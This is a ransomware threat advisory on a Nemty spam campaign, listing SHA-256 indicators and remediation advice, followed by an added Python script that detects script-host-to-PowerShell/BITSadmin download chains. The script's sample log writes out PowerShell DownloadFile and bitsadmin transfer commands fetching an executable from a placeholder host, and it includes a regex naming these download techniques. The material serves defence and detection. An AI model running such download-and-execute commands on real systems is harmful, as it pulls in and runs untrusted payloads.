Severity
High
Analysis Summary
A new Nemty ransomware campaign shows changes in its distribution methods. The first wave of Nemty activity spread via RDP and quickly moved to using the Phorpiex botnet to spread via SMB hosts with weak credentials. In this new campaign, the Phorpiex botnet continues to be leveraged, but this time to send spam emails. These emails have ZIP archives attached and a subject line that is simply a smiley emoji; the subject line is likely meant to evade keyword detection in spam filters. Inside the ZIP archive is a VBScript file used to download and execute the final payload. CMD is used in combination with both PowerShell and BITSadmin, likely to increase the chance of infection if one of the methods is blocked by firewalls or AV. In some cases, garbage code was added to obfuscate the file and evade static detection. The Nemty ransomware is downloaded as an executable from a known Phorpiex server.
Impact
File Encryption
Indicators of Compromise
SHA-256
- bc7e55048478507b6734c8314857f33309f663ff4f3c3cb65e653a5b308f0bd5
- 0517ae27126f767937976d733064869a1b5296aaf622596af6cd4c4aa2184bd2
- 069390b186ce9a3678441d208a5614340d4b2a0a7bbe2991e3087b72e7480112
- 06cf3e872a886db4ed77639eebe08361f9a81d4908ee643de0135f491f690923
- 06df03c989148bcbee007b66216a4fdcec635491922fd744a32315010ba99d2a
- 07c2632f548015a0e61d14b8f5a9e4e988c1674fcc02a90a87d3d94afe0c8135
- 080cb0ad0d69490097f641311186147e8b16954d23885630a7231f7ff5bd8bda
- 0c0c467b094b13943ea7d2b5f91fb19e81c6b521a7a58c27e571ed33a56d8ccb
- 0da9aa96f41ad1cc117dcff1272521a0b9be55e59635704af897169268ef2db7
- 0f49c5375ac7aac76caf8cb0dfd16b8f422e197162c36a4a4ba1449cd08e5056
- 12294dbc60c9b9935abdbba25da98b0314f82da9252e29229860ee4e346aa6ad
- 1261860de3fd1ea3e59f61572f12c2efa41d460896a46ef8731787724f8845ca
- 150b1e4155894701c4b8919413b73d4eebc1d781c4203f54a0713b552f6961be
- 160402da510e6c751bef39ab6af152ef71d7a25c710a8d88586dc56b5bfe1170
- 170d3ddddc64a9feca1fc5ef77b5c1fd0b86b8fb98a91256070ad7be7cf0e619
- 18b656b27704b9fe418d55f5472bda0b2ffe5ae8eb26b910f4db4029fb8a9f7e
- 25a29351100b75f30ae133a3e035b2852298bbe05b9fd08f73a4a8fda52c439d
- 2f3bed3382382b95c84390b6138f68875ce96273fa5f521bab83d67b8e9ad740
- 758c26dcf2a8963b3fcf3b6ea796aacf08870b9733ac87a608cd1be6b56af421
- b20e0ade92a2e824f66e991db75f9ef8b9260e9acda55d52b0d9e1c0936919f8
- e96ca035fc8a2c2ae2dc2e6c112942469821c6682beab8fa7ece1e25e55497ba
Remediation
- Block all threat indicators at your respective controls.
- Always be suspicious about emails sent by unknown senders.
- Never click on the links/attachments sent by unknown senders.
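The following Python script is an added detection example, not part of the Rewterz advisory. It covers two points from the page: the infection chain in the Analysis Summary (a VBScript dropped from a ZIP spawning CMD, which in turn launches PowerShell or BITSadmin to fetch the payload) and the "block all threat indicators" remediation item. The first check walks process-creation events and flags any PowerShell or BITSadmin process that has a Windows script host (wscript.exe/cscript.exe) among its ancestors; the second matches observed file hashes against the advisory's SHA-256 list. The pipe-delimited log format, the sample events and the `EXAMPLE-PLACEHOLDER` host are constructed for the demo; only the hash values are taken from the page.

```python
"""Detection example for the Nemty spam campaign chain described above.

Added example (not code from the advisory or from Rewterz). Assumptions:
- Process-creation events arrive as 'pid|ppid|image|cmdline' lines (constructed format).
- The hostname EXAMPLE-PLACEHOLDER in the sample log is a placeholder, not a real IoC.
"""
import re
from dataclasses import dataclass

# Subset of the SHA-256 indicators listed in the advisory (values copied from the page).
NEMTY_SHA256 = {
    "bc7e55048478507b6734c8314857f33309f663ff4f3c3cb65e653a5b308f0bd5",
    "0517ae27126f767937976d733064869a1b5296aaf622596af6cd4c4aa2184bd2",
    "069390b186ce9a3678441d208a5614340d4b2a0a7bbe2991e3087b72e7480112",
}

# Script hosts that run the VBScript dropped from the ZIP attachment.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Downloaders the advisory says CMD launches to fetch the payload.
DOWNLOADERS = {"powershell.exe", "bitsadmin.exe"}
# Command-line fragments that indicate a download rather than benign admin use.
DOWNLOAD_HINTS = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|start-bitstransfer|bitsadmin.*?/transfer",
    re.IGNORECASE,
)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed sample log: one malicious chain (202 -> 303/304 -> 405/406) and one benign
# cmd -> powershell pair (501 -> 502) that must NOT be flagged.
SAMPLE_LOG = """\
101|1|explorer.exe|C:\\Windows\\explorer.exe
202|101|wscript.exe|wscript.exe C:\\Users\\u\\AppData\\Local\\Temp\\invoice.vbs
303|202|cmd.exe|cmd.exe /c powershell -w hidden (New-Object Net.WebClient).DownloadFile('http://EXAMPLE-PLACEHOLDER/x.exe','%TEMP%\\x.exe')
304|202|cmd.exe|cmd.exe /c bitsadmin /transfer j /download http://EXAMPLE-PLACEHOLDER/x.exe %TEMP%\\x.exe
405|303|powershell.exe|powershell -w hidden (New-Object Net.WebClient).DownloadFile('http://EXAMPLE-PLACEHOLDER/x.exe','%TEMP%\\x.exe')
406|304|bitsadmin.exe|bitsadmin /transfer j /download http://EXAMPLE-PLACEHOLDER/x.exe %TEMP%\\x.exe
501|101|cmd.exe|cmd.exe /c dir
502|501|powershell.exe|powershell Get-ChildItem C:\\Temp
"""


def parse_log(text: str) -> dict[int, ProcEvent]:
    """Parse 'pid|ppid|image|cmdline' lines into a pid-keyed table."""
    events = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        pid, ppid, image, cmdline = line.split("|", 3)  # cmdline may itself contain '|'
        events[int(pid)] = ProcEvent(int(pid), int(ppid), image.strip().lower(), cmdline)
    return events


def ancestors(events: dict[int, ProcEvent], pid: int, max_depth: int = 4) -> list[ProcEvent]:
    """Return the parent chain of pid, nearest parent first, up to max_depth levels."""
    chain = []
    cur = events.get(pid)
    while cur is not None and len(chain) < max_depth:
        parent = events.get(cur.ppid)
        if parent is None:
            break
        chain.append(parent)
        cur = parent
    return chain


def find_download_chains(events: dict[int, ProcEvent]) -> list[dict]:
    """Flag PowerShell/BITSadmin processes descended from a script host.

    Ancestry is the primary signal (it survives command-line obfuscation); the
    download-hint regex is reported alongside it for analyst context.
    """
    hits = []
    for ev in events.values():
        if ev.image not in DOWNLOADERS:
            continue
        anc = ancestors(events, ev.pid)
        if any(a.image in SCRIPT_HOSTS for a in anc):
            hits.append({
                "pid": ev.pid,
                "chain": " <- ".join([ev.image] + [a.image for a in anc]),
                "download_hint": bool(DOWNLOAD_HINTS.search(ev.cmdline)),
            })
    return hits


def match_hashes(observed: list[str], indicators: set[str] = NEMTY_SHA256) -> list[str]:
    """Return the observed SHA-256 values that appear in the indicator list."""
    return sorted(h.strip().lower() for h in observed if h.strip().lower() in indicators)


if __name__ == "__main__":
    for hit in find_download_chains(parse_log(SAMPLE_LOG)):
        print(f"ALERT pid={hit['pid']} chain={hit['chain']} download_hint={hit['download_hint']}")
    print("hash matches:", match_hashes(["BC7E55048478507B6734C8314857F33309F663FF4F3C3CB65E653A5B308F0BD5"]))
```

The benign `cmd.exe /c dir` followed by `powershell Get-ChildItem` is deliberately included so the rule is exercised against the false-positive case: it has no script-host ancestor and is not reported. In a real deployment the ancestry check would be fed from Sysmon Event ID 1 or EDR process telemetry, and the hash set would hold the full indicator list from the advisory rather than the three-entry subset used here.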